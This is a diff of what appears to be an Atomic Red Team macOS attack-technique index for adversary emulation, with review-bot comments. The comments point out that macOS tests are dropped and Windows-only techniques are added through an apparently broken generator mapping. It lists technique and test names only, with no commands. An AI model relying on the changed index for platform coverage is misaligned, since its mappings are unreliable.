-- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
-- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- - Atomic Test #1: Logon Scripts - Mac [macos]
+- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- - Atomic Test #1: Launch Daemon [macos]
- - Atomic Test #2: Launch Daemon - Users Directory [macos]
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
-- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- - Atomic Test #1: Trap EXIT [macos, linux]
- - Atomic Test #3: Trap SIGINT [macos, linux]
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #3: Create a user account on a MacOS system [macos]
-- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- - Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- - Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- - Atomic Test #1: Persistance with Event Monitor - emond [macos]
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- - Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- - Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
- - Atomic Test #1: Add command to .bash_profile [macos, linux]
- - Atomic Test #2: Add command to .bashrc [macos, linux]
-- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- - Atomic Test #1: Add file to Local Library StartupItems [macos]
- - Atomic Test #2: Add launch script to launch daemon [macos]
- - Atomic Test #3: Add launch script to launch agent [macos]
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- - Atomic Test #1: Launch Agent [macos]
- - Atomic Test #2: Event Monitor Daemon Persistence [macos]
- - Atomic Test #3: Launch Agent - Root Directory [macos]
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- - Atomic Test #1: rc.common [macos]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- - Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- - Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- - Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1653 Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
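Review bot: the persistence section loses every macOS-specific technique that had working tests (T1053.003 Cron, T1037.002 Logon Script (Mac), T1543.004 Launch Daemon, T1543.001 Launch Agent, T1546.005 Trap, T1574.006 LD_PRELOAD with its `Dylib Injection via DYLD_INSERT_LIBRARIES [macos]` test, T1098.004 SSH Authorized Keys, T1547.015 Login Items, T1546.014 Emond, T1547.006 Kernel Modules and Extensions, T1546.004 .bash_profile .bashrc and .shrc, T1037.005 Startup Items, T1037.004 Rc.common, T1547.007 Re-opened Applications) while gaining Windows-only CONTRIBUTE A TEST entries such as T1547.001 Registry Run Keys / Startup Folder, T1547.004 Winlogon Helper DLL, T1547.008 LSASS Driver, T1137 Office Application Startup, T1505.004 IIS Components and T1197 BITS Jobs; the new `# privilege-escalation` and `# execution` sections show the same pattern, listing the macOS tests for T1078.001 and T1078.003 next to Windows-only techniques like T1548.002 Bypass User Account Control and T1546.012 Image File Execution Options Injection. That is consistent with the generator's platform-to-technique mapping being broken for this index, and the file should not be regenerated from that state. Two smaller points: the added `# privilege-escalation` and `# execution` headers are preceded by a blank line while `# persistence` and `# command-and-control` are not, so header spacing should be made uniform in the template, and `T1137.001 Office Application Startup: Office Template Macros.` carries a trailing period that the other technique names do not; strip trailing punctuation when rendering names.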
@@ -268,6 +425,7 @@
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -295,7 +453,7 @@
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -332,6 +490,7 @@
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #8: MacOS Swift Keylogger [macos]
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #3: using Quicktime Player [macos]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -339,6 +498,7 @@
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
+- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #3: Execute commands from clipboard [macos]
@@ -346,7 +506,9 @@
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
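Review bot: T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay is a Windows network technique, yet this collection section otherwise lists [macos] and [linux, macos] tests; check whether it belongs in this index or whether the generator's technique-to-platform mapping has drifted.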
@@ -355,122 +517,57 @@
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #3: AppleScript - Spoofing a credential prompt using osascript [macos]
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- [T1021.005 Remote Services:VNC](../../T1021.005/T1021.005.md)
- Atomic Test #1: Enable Apple Remote Desktop Agent [macos]
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1021.004 Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.002 Remote Services: SMB/Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.006 Remote Services: Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.003 Remote Services: Distributed Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# privilege-escalation
-- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- - Atomic Test #1: Sudo usage [macos, linux]
- - Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
- - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
-- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- - Atomic Test #1: Logon Scripts - Mac [macos]
-- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- - Atomic Test #1: Launch Daemon [macos]
- - Atomic Test #2: Launch Daemon - Users Directory [macos]
-- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- - Atomic Test #3: Enable Guest Account on macOS [macos]
-- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- - Atomic Test #1: Trap EXIT [macos, linux]
- - Atomic Test #3: Trap SIGINT [macos, linux]
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
-- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- - Atomic Test #1: Make and modify binary from C source [macos, linux]
- - Atomic Test #3: Set a SetUID flag on file [macos, linux]
- - Atomic Test #5: Set a SetGID flag on file [macos, linux]
-- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- - Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
-- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- - Atomic Test #2: Add macOS LoginItem using Applescript [macos]
-- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- - Atomic Test #1: Persistance with Event Monitor - emond [macos]
-- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- - Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- - Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
-- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
- - Atomic Test #1: Add command to .bash_profile [macos, linux]
- - Atomic Test #2: Add command to .bashrc [macos, linux]
-- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- - Atomic Test #1: Add file to Local Library StartupItems [macos]
- - Atomic Test #2: Add launch script to launch daemon [macos]
- - Atomic Test #3: Add launch script to launch agent [macos]
-- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- - Atomic Test #1: Launch Agent [macos]
- - Atomic Test #2: Event Monitor Daemon Persistence [macos]
- - Atomic Test #3: Launch Agent - Root Directory [macos]
-- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- - Atomic Test #1: rc.common [macos]
-- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- - Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- - Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- - Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
-- T1548.006 TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+- T1563.002 Remote Service Session Hijacking: RDP Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.001 Remote Services: Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
